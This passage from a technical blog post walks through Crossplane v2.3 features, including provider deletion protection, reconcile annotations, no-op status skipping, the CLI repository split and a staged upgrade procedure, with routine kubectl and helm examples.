&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Verify after enable&lt;/span&gt;
helm upgrade crossplane crossplane-stable/crossplane &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--version&lt;/span&gt; 2.3.0 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; crossplane-system &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-f&lt;/span&gt; helm/crossplane-values.yaml

&lt;span class="c"&gt;# ClusterUsage is auto-created on Provider install&lt;/span&gt;
kubectl get clusterusage
&lt;span class="c"&gt;# NAME                              OF                       BY                 AGE&lt;/span&gt;
&lt;span class="c"&gt;# protect-provider-aws-12fa3        provider-aws             provider-aws-mrs   1m&lt;/span&gt;

&lt;span class="c"&gt;# Intentional delete attempt — refused&lt;/span&gt;
kubectl delete provider provider-aws
&lt;span class="c"&gt;# Error from server (Forbidden): admission webhook "no-usages.apiextensions.crossplane.io" denied the request:&lt;/span&gt;
&lt;span class="c"&gt;# this provider is in-use by 247 managed resources of 12 kinds: cannot delete&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3.4 Standard Tear-Down Workflow
&lt;/h3&gt;

&lt;p&gt;Even with the alpha gate on, you still need a clean tear-down procedure. Our ManoIT standard:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Step 1: inventory every MR of the Provider&lt;/span&gt;
kubectl get &lt;span class="si"&gt;$(&lt;/span&gt;kubectl api-resources &lt;span class="nt"&gt;--api-group&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;aws.upbound.io &lt;span class="nt"&gt;-o&lt;/span&gt; name | &lt;span class="nb"&gt;paste&lt;/span&gt; &lt;span class="nt"&gt;-sd&lt;/span&gt;, -&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="nt"&gt;-A&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;jsonpath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{range .items[*]}{.kind}{"\t"}{.metadata.namespace}{"/"}{.metadata.name}{"\n"}{end}'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; aws-mrs-inventory.tsv

&lt;span class="c"&gt;# Step 2: decide deletionPolicy=Orphan or proper delete, apply in bulk&lt;/span&gt;
xargs &lt;span class="nt"&gt;-a&lt;/span&gt; aws-mrs-inventory.tsv &lt;span class="nt"&gt;-I&lt;/span&gt;&lt;span class="o"&gt;{}&lt;/span&gt; kubectl patch &lt;span class="o"&gt;{}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;merge &lt;span class="nt"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;'{"spec":{"deletionPolicy":"Orphan"}}'&lt;/span&gt;

&lt;span class="c"&gt;# Step 3: delete all MRs — ClusterUsage auto-transitions to Inactive&lt;/span&gt;
xargs &lt;span class="nt"&gt;-a&lt;/span&gt; aws-mrs-inventory.tsv &lt;span class="nt"&gt;-I&lt;/span&gt;&lt;span class="o"&gt;{}&lt;/span&gt; kubectl delete &lt;span class="o"&gt;{}&lt;/span&gt;
kubectl get clusterusage protect-provider-aws-12fa3 &lt;span class="nt"&gt;-o&lt;/span&gt; yaml | yq &lt;span class="s1"&gt;'.status.conditions[0].reason'&lt;/span&gt;
&lt;span class="c"&gt;# Inactive&lt;/span&gt;

&lt;span class="c"&gt;# Step 4: remove ClusterUsage → Provider delete now allowed&lt;/span&gt;
kubectl delete clusterusage protect-provider-aws-12fa3
kubectl delete provider provider-aws
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  4. Two Reconciliation Annotations — Per-Resource Polling and Immediate Trigger
&lt;/h2&gt;

&lt;p&gt;The third change resolves a six-year-old operator ask: per-resource reconcile cadence control, via two annotations.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Annotation&lt;/th&gt;
&lt;th&gt;Meaning&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;th&gt;Use case&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;crossplane.io/poll-interval&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Override controller-level poll interval for this resource&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;"24h"&lt;/code&gt;, &lt;code&gt;"30m"&lt;/code&gt;, &lt;code&gt;"5m"&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Low-volatility IAM, baseline infra&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;crossplane.io/reconcile-requested-at&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Trigger an immediate reconcile whenever the value changes&lt;/td&gt;
&lt;td&gt;RFC3339 timestamp (&lt;code&gt;"2026-05-27T08:15:00Z"&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Post-external-change sync, debugging, operational force-refresh&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  4.1 Per-Resource Poll Override — End of Global-Only Cadence
&lt;/h3&gt;

&lt;p&gt;Through v2.2 the poll interval was a single controller-startup flag (&lt;code&gt;--poll-interval&lt;/code&gt;). The result: an IAM Role that almost never changes was polled at the same cadence as an RDS Instance, inflating cloud-API call cost and controller load.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# IAM Role — barely changes, 24h polling is enough&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;iam.aws.m.upbound.io/v1beta1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Role&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;platform&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-node-role&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;crossplane.io/poll-interval&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;24h"&lt;/span&gt;   &lt;span class="c1"&gt;# v2.3 new&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;forProvider&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;assumeRolePolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
      &lt;span class="s"&gt;{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ec2.amazonaws.com"},"Action":"sts:AssumeRole"}]}&lt;/span&gt;
&lt;span class="s"&gt;---&lt;/span&gt;
&lt;span class="c1"&gt;# RDS Instance — fast sync for backup/snapshot state, 1m polling&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;rds.aws.m.upbound.io/v1beta1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Instance&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;marketing&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;marketing-pg&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;crossplane.io/poll-interval&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;1m"&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;forProvider&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;region&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ap-northeast-2&lt;/span&gt;
    &lt;span class="na"&gt;engine&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;postgres&lt;/span&gt;
    &lt;span class="na"&gt;engineVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;18.4"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.2 Immediate Trigger — Post-External-Change Sync
&lt;/h3&gt;

&lt;p&gt;The second annotation, &lt;code&gt;reconcile-requested-at&lt;/code&gt;, re-enqueues the resource immediately whenever its value changes. Two operational examples:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Scenario 1: rotate the RDS master password out-of-band, force immediate sync&lt;/span&gt;
aws rds modify-db-instance &lt;span class="nt"&gt;--db-instance-identifier&lt;/span&gt; marketing-pg &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--master-user-password&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;openssl rand &lt;span class="nt"&gt;-base64&lt;/span&gt; 32&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="nt"&gt;--apply-immediately&lt;/span&gt;
kubectl annotate &lt;span class="nt"&gt;-n&lt;/span&gt; marketing instance.rds.aws.m.upbound.io marketing-pg &lt;span class="se"&gt;\&lt;/span&gt;
  crossplane.io/reconcile-requested-at&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; +%FT%TZ&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="nt"&gt;--overwrite&lt;/span&gt;

&lt;span class="c"&gt;# Scenario 2: debug — a new Composition Function just merged, force re-evaluate every XR&lt;/span&gt;
kubectl get app &lt;span class="nt"&gt;-A&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; name | &lt;span class="k"&gt;while &lt;/span&gt;&lt;span class="nb"&gt;read &lt;/span&gt;xr&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;&lt;span class="nv"&gt;ns&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$xr&lt;/span&gt; | &lt;span class="nb"&gt;awk&lt;/span&gt; &lt;span class="nt"&gt;-F&lt;/span&gt;/ &lt;span class="s1"&gt;'{print $1}'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;
  &lt;span class="nv"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$xr&lt;/span&gt; | &lt;span class="nb"&gt;awk&lt;/span&gt; &lt;span class="nt"&gt;-F&lt;/span&gt;/ &lt;span class="s1"&gt;'{print $2}'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;
  kubectl annotate &lt;span class="nt"&gt;-n&lt;/span&gt; &lt;span class="nv"&gt;$ns&lt;/span&gt; &lt;span class="nv"&gt;$xr&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    crossplane.io/reconcile-requested-at&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; +%FT%TZ&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="nt"&gt;--overwrite&lt;/span&gt;
&lt;span class="k"&gt;done&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  5. XR Circuit Breaker Reset — Same-Named Replacements Start Clean
&lt;/h2&gt;

&lt;p&gt;Through v2.2, if an XR tripped its circuit breaker (Crossplane's protection against reconcile thrashing) and you deleted the XR, &lt;strong&gt;the breaker state was inherited by any same-named replacement&lt;/strong&gt;. The natural recovery instinct — "delete it, recreate it, it'll work" — didn't actually work, and operators ended up restarting controller pods to flush state.&lt;/p&gt;

&lt;p&gt;v2.3 discards the circuit-breaker state the moment the XR is deleted. A same-named replacement starts from the &lt;strong&gt;same clean state as a brand-new resource&lt;/strong&gt;.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Scenario&lt;/th&gt;
&lt;th&gt;v2.2 (before)&lt;/th&gt;
&lt;th&gt;v2.3 (after)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;XR reconcile is throttled by thrashing&lt;/td&gt;
&lt;td&gt;Circuit open&lt;/td&gt;
&lt;td&gt;Circuit open&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Operator deletes the XR&lt;/td&gt;
&lt;td&gt;Circuit state cached/retained&lt;/td&gt;
&lt;td&gt;Circuit state discarded immediately&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Same-named XR recreated&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Inherits open circuit → no reconcile after recreate&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Starts clean → reconciles immediately&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Recovery procedure&lt;/td&gt;
&lt;td&gt;Restart controller pod or use a different name&lt;/td&gt;
&lt;td&gt;Same name + recreate is sufficient&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Operational cognitive cost&lt;/td&gt;
&lt;td&gt;Tribal-knowledge accretion&lt;/td&gt;
&lt;td&gt;Reduced to a 1-step standard procedure&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  6. No-op Status Update Skip on CompositionRevision/Composite Reconcilers
&lt;/h2&gt;

&lt;p&gt;The fifth change is ETCD write-load optimization. Through v2.2, the CompositionRevision controller and the composite reconciler issued a status update PUT every reconcile loop, even when nothing in the status had actually changed. At cluster scale this "no-change status PUT" was a measurable fraction of ETCD traffic.&lt;/p&gt;

&lt;p&gt;v2.3 compares the previous and new status and skips the PUT when they're identical. Enable with the alpha gate &lt;code&gt;--enable-no-op-status-update-skip&lt;/code&gt;. On our staging cluster (~4,200 MRs) we measured &lt;strong&gt;ETCD PUT call volume down ~31%, apiserver CPU down ~18%&lt;/strong&gt; in steady state. The effect scales with cluster size.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Prometheus queries — before/after the alpha gate
# (1) ETCD PUT call volume
sum(rate(etcd_request_duration_seconds_count{operation="put"}[5m]))

# (2) apiserver CPU
sum(rate(container_cpu_usage_seconds_total{namespace="kube-system",pod=~"kube-apiserver-.*"}[5m]))

# (3) Crossplane controller's own reconcile rate (side-effect watch)
sum(rate(controller_runtime_reconcile_total{controller="composite"}[5m])) by (result)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  7. Crossplane CLI Repository Split and Independent Release Cycle
&lt;/h2&gt;

&lt;p&gt;The sixth change touches even non-coder operators. The CLI (formerly called &lt;code&gt;crank&lt;/code&gt;) leaves the core repo with v2.3.0. Its new home is &lt;a href="https://github.com/crossplane/crossplane-cli" rel="noopener noreferrer"&gt;github.com/crossplane/crossplane-cli&lt;/a&gt;, and from here on out the version numbers and release cadences are independent.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Axis&lt;/th&gt;
&lt;th&gt;Pre-v2.3&lt;/th&gt;
&lt;th&gt;Post-v2.3&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Repository&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;crossplane/crossplane&lt;/code&gt; (single)&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;crossplane/crossplane&lt;/code&gt; (core) + &lt;code&gt;crossplane/crossplane-cli&lt;/code&gt; (CLI)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Version sync&lt;/td&gt;
&lt;td&gt;Always identical&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Independent — CLI can move faster&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Release cadence&lt;/td&gt;
&lt;td&gt;Quarterly (3 months)&lt;/td&gt;
&lt;td&gt;Core quarterly, CLI as needed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Install command&lt;/td&gt;
&lt;td&gt;&lt;code&gt;curl ... /bin/linux_amd64/crank&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;curl ... /bin/linux_amd64/crossplane&lt;/code&gt; (unified name)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Version compatibility&lt;/td&gt;
&lt;td&gt;1:1&lt;/td&gt;
&lt;td&gt;CLI guarantees backwards compat to core N-2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;New command&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;crossplane beta trace&lt;/code&gt; (table-only)&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;crossplane beta trace -o yaml&lt;/code&gt; (YAML output added)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  7.1 YAML Trace Output — GitOps Friendliness
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# v2.3 new: take trace output as YAML and pipe to other tools&lt;/span&gt;
crossplane beta trace &lt;span class="nt"&gt;-o&lt;/span&gt; yaml app/my-app &lt;span class="nt"&gt;-n&lt;/span&gt; marketing &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; trace.yaml

&lt;span class="c"&gt;# Combine with kubectl-tree to visualize control-plane topology&lt;/span&gt;
yq &lt;span class="s1"&gt;'.children[].name'&lt;/span&gt; trace.yaml | &lt;span class="k"&gt;while &lt;/span&gt;&lt;span class="nb"&gt;read &lt;/span&gt;child&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;kubectl tree &lt;span class="nv"&gt;$child&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; marketing
&lt;span class="k"&gt;done&lt;/span&gt;

&lt;span class="c"&gt;# Drift detection — store trace output in Git, surface diffs as PRs&lt;/span&gt;
&lt;span class="nb"&gt;cp &lt;/span&gt;trace.yaml &lt;span class="nb"&gt;history&lt;/span&gt;/trace-&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; +%Y%m%d&lt;span class="si"&gt;)&lt;/span&gt;.yaml
git add &lt;span class="nb"&gt;history&lt;/span&gt;/trace-&lt;span class="k"&gt;*&lt;/span&gt;.yaml &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; git commit &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="s2"&gt;"chore: nightly trace snapshot"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  8. Upgrade Workflow — v2.2 → v2.3 (Non-Disruptive Standard)
&lt;/h2&gt;

&lt;p&gt;v2.3 is a minor upgrade inside the v2.x series, so API compatibility is preserved. Alpha gates must still be staged. Our standard four-step procedure:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Step 1: precondition check — Provider/Function packages are fully qualified URLs&lt;/span&gt;
&lt;span class="c"&gt;# v2 rejects short names, so this needs verification just before v2.2 → v2.3&lt;/span&gt;
kubectl get pkg &lt;span class="nt"&gt;-A&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;jsonpath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{range .items[*]}{.kind}{"\t"}{.metadata.name}{"\t"}{.spec.package}{"\n"}{end}'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  | &lt;span class="nb"&gt;awk&lt;/span&gt; &lt;span class="nt"&gt;-F&lt;/span&gt;&lt;span class="s1"&gt;'\t'&lt;/span&gt; &lt;span class="s1"&gt;'$3 !~ /\// {print "❌ NOT FQ:", $0}'&lt;/span&gt;
&lt;span class="c"&gt;# (must be empty to pass)&lt;/span&gt;

&lt;span class="c"&gt;# Step 2: dev cluster upgrade — alpha gates OFF&lt;/span&gt;
helm upgrade crossplane crossplane-stable/crossplane &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--version&lt;/span&gt; 2.3.0 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; crossplane-system &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--reuse-values&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--wait&lt;/span&gt;
kubectl &lt;span class="nt"&gt;-n&lt;/span&gt; crossplane-system get deploy crossplane &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;jsonpath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{.spec.template.spec.containers[0].image}'&lt;/span&gt;
&lt;span class="c"&gt;# crossplane/crossplane:v2.3.0&lt;/span&gt;

&lt;span class="c"&gt;# Step 3: regression — render-diff every Composition against golden output&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;f &lt;span class="k"&gt;in &lt;/span&gt;compositions/&lt;span class="k"&gt;*&lt;/span&gt;.yaml&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;&lt;span class="nv"&gt;comp&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;yq &lt;span class="s1"&gt;'.metadata.name'&lt;/span&gt; &lt;span class="nv"&gt;$f&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;
  crossplane render xrs/test-&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;comp&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;.yaml &lt;span class="nv"&gt;$f&lt;/span&gt; functions/index.yaml &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; /tmp/render-&lt;span class="nv"&gt;$comp&lt;/span&gt;.yaml
  diff /tmp/render-&lt;span class="nv"&gt;$comp&lt;/span&gt;.yaml golden/render-&lt;span class="nv"&gt;$comp&lt;/span&gt;.golden.yaml &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"❌ regression in &lt;/span&gt;&lt;span class="nv"&gt;$comp&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;exit &lt;/span&gt;1&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="o"&gt;}&lt;/span&gt;
&lt;span class="k"&gt;done&lt;/span&gt;

&lt;span class="c"&gt;# Step 4: staged staging → prod rollout. Alpha gates: ON in staging first, then prod&lt;/span&gt;
helm upgrade crossplane crossplane-stable/crossplane &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--version&lt;/span&gt; 2.3.0 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; crossplane-system &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; &lt;span class="s1"&gt;'args={--debug,--enable-environment-configs,--enable-operations,--enable-provider-deletion-protection,--enable-no-op-status-update-skip}'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--wait&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  9. ManoIT In-House Adoption Checklist — Three Control Planes × Sixteen Steps
&lt;/h2&gt;

&lt;p&gt;ManoIT runs three control planes (prod/stage/dev), so we stage the alpha gates: one week in staging, one more week in prod, then enable. The full checklist:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Item&lt;/th&gt;
&lt;th&gt;Owner&lt;/th&gt;
&lt;th&gt;Done when&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Inventory Crossplane/Provider/Function versions on all three control planes&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Merged spreadsheet&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Audit fully qualified package URLs — flag any remaining short names&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;kubectl get pkg&lt;/code&gt; shows 0 NOT-FQ&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Upgrade dev to v2.3.0 (alpha gates OFF)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;crossplane version --server&lt;/code&gt; = v2.3.0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Composition regression — render vs. golden&lt;/td&gt;
&lt;td&gt;Service owners&lt;/td&gt;
&lt;td&gt;All diffs = 0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Staging: v2.3.0 + &lt;code&gt;--enable-no-op-status-update-skip&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;1-week soak, ETCD PUT delta report&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Staging: add &lt;code&gt;--enable-provider-deletion-protection&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;ClusterUsage auto-created, refused-delete smoke test passes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Apply &lt;code&gt;crossplane.io/poll-interval&lt;/code&gt; to low-volatility MRs (IAM/VPC)&lt;/td&gt;
&lt;td&gt;Service owners&lt;/td&gt;
&lt;td&gt;≥30% drop in cloud API calls post-apply&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
